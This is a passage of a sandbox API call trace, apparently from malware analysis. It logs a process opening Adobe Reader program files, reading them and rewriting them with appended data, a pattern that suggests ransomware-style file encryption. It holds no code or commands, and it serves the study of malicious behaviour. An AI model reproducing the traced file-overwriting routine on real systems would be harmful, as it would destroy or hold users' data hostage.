lpOverlapped=0x0) returned 1 [0067.709] CloseHandle (hObject=0x1dc) returned 1 [0067.720] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0068.372] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0068.373] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x260 [0068.373] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0068.373] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.373] ReleaseMutex (hMutex=0x168) returned 1 [0068.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0068.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0068.373] ReadFile (in: hFile=0x1bc, lpBuffer=0x1f64ee8, nNumberOfBytesToRead=0x260, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f64ee8*, lpNumberOfBytesRead=0x2b1f2bc*=0x260, lpOverlapped=0x0) returned 1 [0068.383] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0068.383] WriteFile (in: hFile=0x1bc, lpBuffer=0x1ea3978*, nNumberOfBytesToWrite=0x7e8, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesWritten=0x2b1f2d0*=0x7e8, lpOverlapped=0x0) returned 1 [0068.383] CloseHandle (hObject=0x1bc) returned 1 [0068.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\PTB\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ptb\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0068.388] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0068.388] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x470 [0068.388] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0068.388] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.388] ReleaseMutex (hMutex=0x168) returned 1 [0068.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0068.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0068.389] ReadFile (in: hFile=0x1bc, lpBuffer=0x269c668, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2b1f2bc*=0x470, lpOverlapped=0x0) returned 1 [0068.399] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0068.400] WriteFile (in: hFile=0x1bc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9f8, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x9f8, lpOverlapped=0x0) returned 1 [0068.400] CloseHandle (hObject=0x1bc) returned 1 [0068.401] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\SLV\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\slv\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0068.402] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0068.402] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x440 [0068.402] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0068.402] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.402] ReleaseMutex (hMutex=0x168) returned 1 [0068.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0068.402] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7320c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0068.402] ReadFile (in: hFile=0x1bc, lpBuffer=0x269c668, nNumberOfBytesToRead=0x440, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x2b1f2bc*=0x440, lpOverlapped=0x0) returned 1 [0068.413] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0068.414] WriteFile (in: hFile=0x1bc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9c8, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x9c8, lpOverlapped=0x0) returned 1 [0068.414] CloseHandle (hObject=0x1bc) returned 1 [0068.415] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\UKR\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ukr\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0068.415] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0068.416] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4a0 [0068.416] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0068.416] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.416] ReleaseMutex (hMutex=0x168) returned 1 [0068.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0068.416] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.ini", cchWideChar=8, lpMultiByteStr=0x1f7328c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.ini", lpUsedDefaultChar=0x0) returned 8 [0068.416] ReadFile (in: hFile=0x1bc, lpBuffer=0x2863a48, nNumberOfBytesToRead=0x4a0, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesRead=0x2b1f2bc*=0x4a0, lpOverlapped=0x0) returned 1 [0068.429] SetFilePointer (in: hFile=0x1bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0068.429] WriteFile (in: hFile=0x1bc, lpBuffer=0x1e980a8*, nNumberOfBytesToWrite=0xa28, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e980a8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xa28, lpOverlapped=0x0) returned 1 [0068.429] CloseHandle (hObject=0x1bc) returned 1 [0068.430] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\DigSig.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\digsig.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0068.445] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0068.445] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x20400 [0068.445] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0068.445] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.445] ReleaseMutex (hMutex=0x168) returned 1 [0068.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.CAT", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.CAT", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.CAT", lpUsedDefaultChar=0x0) returned 10 [0068.446] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ea3958, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0068.460] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1f400 [0068.460] ReadFile (in: hFile=0x1dc, lpBuffer=0x2867888, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2867888*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0068.471] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1f400 [0068.472] WriteFile (in: hFile=0x1dc, lpBuffer=0x2865858*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865858*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0068.472] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0068.472] WriteFile (in: hFile=0x1dc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0068.473] CloseHandle (hObject=0x1dc) returned 1 [0068.494] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\PPKLite.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\ppklite.cat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0068.495] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0068.495] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x85c00 [0068.495] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0068.495] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0068.496] ReleaseMutex (hMutex=0x168) returned 1 [0068.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.CAT", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.496] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLite.CAT", cchWideChar=11, lpMultiByteStr=0x1f735ec, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLite.CAT", lpUsedDefaultChar=0x0) returned 11 [0068.496] ReadFile (in: hFile=0x1dc, lpBuffer=0x28830b8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x28830b8*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0068.506] ReadFile (in: hFile=0x1dc, lpBuffer=0x28830b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x28830b8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0068.510] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x84c00 [0068.511] ReadFile (in: hFile=0x1dc, lpBuffer=0x2865858, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2865858*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0068.522] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x84c00 [0068.523] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea9ab8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea9ab8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0068.524] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0068.524] WriteFile (in: hFile=0x1dc, lpBuffer=0x28840b8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28840b8*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0068.524] WriteFile (in: hFile=0x1dc, lpBuffer=0x28840b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28840b8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0068.524] CloseHandle (hObject=0x1dc) returned 1 [0069.249] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0069.616] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0069.616] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe8 [0069.616] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0069.616] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.616] ReleaseMutex (hMutex=0x168) returned 1 [0069.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0069.617] ReadFile (in: hFile=0x1e4, lpBuffer=0x26bf4f8, nNumberOfBytesToRead=0xe8, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bf4f8*, lpNumberOfBytesRead=0x2b1f2bc*=0xe8, lpOverlapped=0x0) returned 1 [0069.618] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0069.618] WriteFile (in: hFile=0x1e4, lpBuffer=0x25a0038*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a0038*, lpNumberOfBytesWritten=0x2b1f2d0*=0x670, lpOverlapped=0x0) returned 1 [0069.619] CloseHandle (hObject=0x1e4) returned 1 [0069.627] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\BRdlang32.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\brdlang32.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0069.629] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0069.629] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3200 [0069.629] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0069.629] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.629] ReleaseMutex (hMutex=0x168) returned 1 [0069.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.CZE", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.CZE", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.CZE", lpUsedDefaultChar=0x0) returned 13 [0069.630] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.632] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2200 [0069.632] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.632] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2200 [0069.633] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e978a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.633] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0069.633] WriteFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0069.633] CloseHandle (hObject=0x1e4) returned 1 [0069.636] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Multimedia.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\multimedia.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0069.637] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0069.637] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x13200 [0069.637] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0069.637] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0069.638] ReleaseMutex (hMutex=0x168) returned 1 [0069.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.CZE", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.CZE", cchWideChar=14, lpMultiByteStr=0x1f735ec, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.CZE", lpUsedDefaultChar=0x0) returned 14 [0069.638] ReadFile (in: hFile=0x1e4, lpBuffer=0x2662a08, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0069.641] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12200 [0069.641] ReadFile (in: hFile=0x1e4, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0069.642] SetFilePointer (in: hFile=0x1e4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12200 [0069.642] WriteFile (in: hFile=0x1e4, lpBuffer=0x1e978a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0069.642] 